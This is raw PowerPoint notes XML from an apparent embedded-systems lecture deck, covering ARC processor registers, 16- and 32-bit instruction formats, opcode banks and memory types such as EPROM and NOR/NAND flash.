                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>32-bit instructions can be split up.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mpiler makes extensive use of the 16-bit instructions.  So, I-cache hit rate is improved, line reload is lower, etc.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BED0585-2B75-4DAC-9F50-F4A7F9D98144}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37891"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7892"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7893"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7894"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135BCDB6-6781-4A5B-9B2F-8FDEAE7F32E7}" type="slidenum">
              <a:rPr lang="en-GB" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37895" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125538" y="701675"/>
            <a:ext cx="4587875" cy="3440113"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37896" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926260" y="4352868"/>
            <a:ext cx="4991680" cy="41415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781" tIns="43391" rIns="86781" bIns="43391"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r0-r25: General purpose registers for all ALU type operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	AND r1, r2, r3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> r1 = r2 &amp; r3</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r26-r28: special registers, used by some assembly commands implicitly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	PUSH_S r1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r29-r31: return addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r63: program counter</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These registers are used as operands in all ALU type operations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	e.g. AND r1,r2,r3 ; r1 gets the result of r2 AND’d with r3</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ALU operations can only act on Core Registers</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As per pure RISC architectures, there is no hardware stack. However the MetaWare tools provide a software stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ARC has some push/pop operations which assume dedicated frame and stack pointer registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e.g. 	PUSH_S	r1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	POP_S	r2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(&lt;inst&gt;_S indicates 16-bit instruction)</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ARC 600 does not allow Loop counter (r60) to be loaded directly from memory using either LD or POP_S instructions.</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r26-r28 are hard coded in some instructions. Need to be aware that when programming in assembler, some instructions will make use of these registers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are three special purpose registers, one for indicating long immediates, one for the loop mechanism and one for holding the current PC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The current PC register, r63, allows PC-relative (i.e. position-independent) table indexing. For instance, the code might contain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ld r0, [r63, table_base - .]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1000">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>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Introduce myself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Syllabus highlights:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Focus on software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is an embedded system? What makes up an embedded system?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How is the development of an embedded system different than “regular” software? Compile, debug, use of OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How do we interact with hardware?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other topics as time allows: security, optimizations for code, data, performance, power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Added value:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interact with industry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Better understand the computer</a:t>
            </a:r>
          </a:p>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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114587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D08A342-054C-4540-A84E-234AE5204D75}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915"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8916"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8917"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8918"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F0151AD9-E2B2-4C5D-B788-4D104A59FE8D}" type="slidenum">
              <a:rPr lang="en-GB" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38919" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147763" y="493713"/>
            <a:ext cx="4568825" cy="3425825"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38920"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US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mode field covers the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>conditional execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> capability.  This results in the instruction being destructive (one of the source registers is also the destination). In this case, the lower </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> bits become the cc.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F7704A9-B8DA-4D04-AC7C-334FDEF3BBCB}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939"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9940"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9941"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9942"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EB6F56EF-BAF6-4A46-BA0D-C07B5145669E}" type="slidenum">
              <a:rPr lang="en-GB" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39943" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147763" y="493713"/>
            <a:ext cx="4568825" cy="3425825"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39944"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GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>o cc field, but some instructions inherently are conditionally executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No flag set field, but some instructions inherently set flags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="100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E242CD8-75A8-4192-BCEC-57DE94DEFB54}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963"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40964"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40965"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40966"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CF4CB1CD-7920-470A-8A72-228D588CC47E}" type="slidenum">
              <a:rPr lang="en-GB" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40967" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147763" y="493713"/>
            <a:ext cx="4568825" cy="3425825"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40968"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US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Branch vs. branch link and branch compare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Load</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Add/sub/shift</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“starndard extensions”: eg. Multiply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRP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The Major Opcode is always the 5 MSbits of the instruction word, independent of the instruction length. For most instruction formats, a sub-opcode field exists which determines the exact functionality of the instruction word.</a:t>
            </a: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Bank 0, the leftmost column, houses all 32-bit instructions. Banks 1-3 house all 16-bit instructions.</a:t>
            </a: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The ARC Programmer’s Manual contains full details of the instruction set and instruction formats.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Various memory types exist in the embedded world, every system uses its own mix-and-match of memory types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Every type of memory has its own characteristics that impact system cost, performance, complexity and more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understanding the differences between memory types is crucial for the embedded programmer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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DDAB066-A332-4A5D-9C5E-AC10C5222AEB}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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AEB6A55-C1ED-4C8A-B4DB-F8A6F35896A2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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EPROM doesn’t really exist</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1DA6502-F096-45CD-88F0-E86003F5E6DF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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“hybrid” memory types</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23604A53-1E5F-4169-BF15-5E973A991C9F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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Durability – compare to HDD</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4AB258C-1DF3-459A-9959-2D978A0330F6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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Difference relies on the difference of the physical structure; basic element being NOR/NAND gate</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8A9DDA1-B026-4A71-AC30-EEFA63B516BF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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54C1A66-9C25-4C4C-9CE6-4176A143A7E3}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37891" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3789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7412"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241A226-260D-44F9-A8BC-06735F129E7A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr 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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2241603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A592B9F-CCB6-428E-8919-62C09FA16AB7}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3891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843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379B26DC-C8B7-4B52-AFC8-9EF5DDCD5F69}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr 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D0B19E4-6BC5-42ED-8909-42832C56DCCE}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3994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9460"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6F8F90D-3F8D-45EE-A3F5-93FD2AAAA5C6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr 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Commands with . Are “comments”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note the “.seg” for segment</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81386CC-290F-48BD-B0FE-F903619FBE83}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
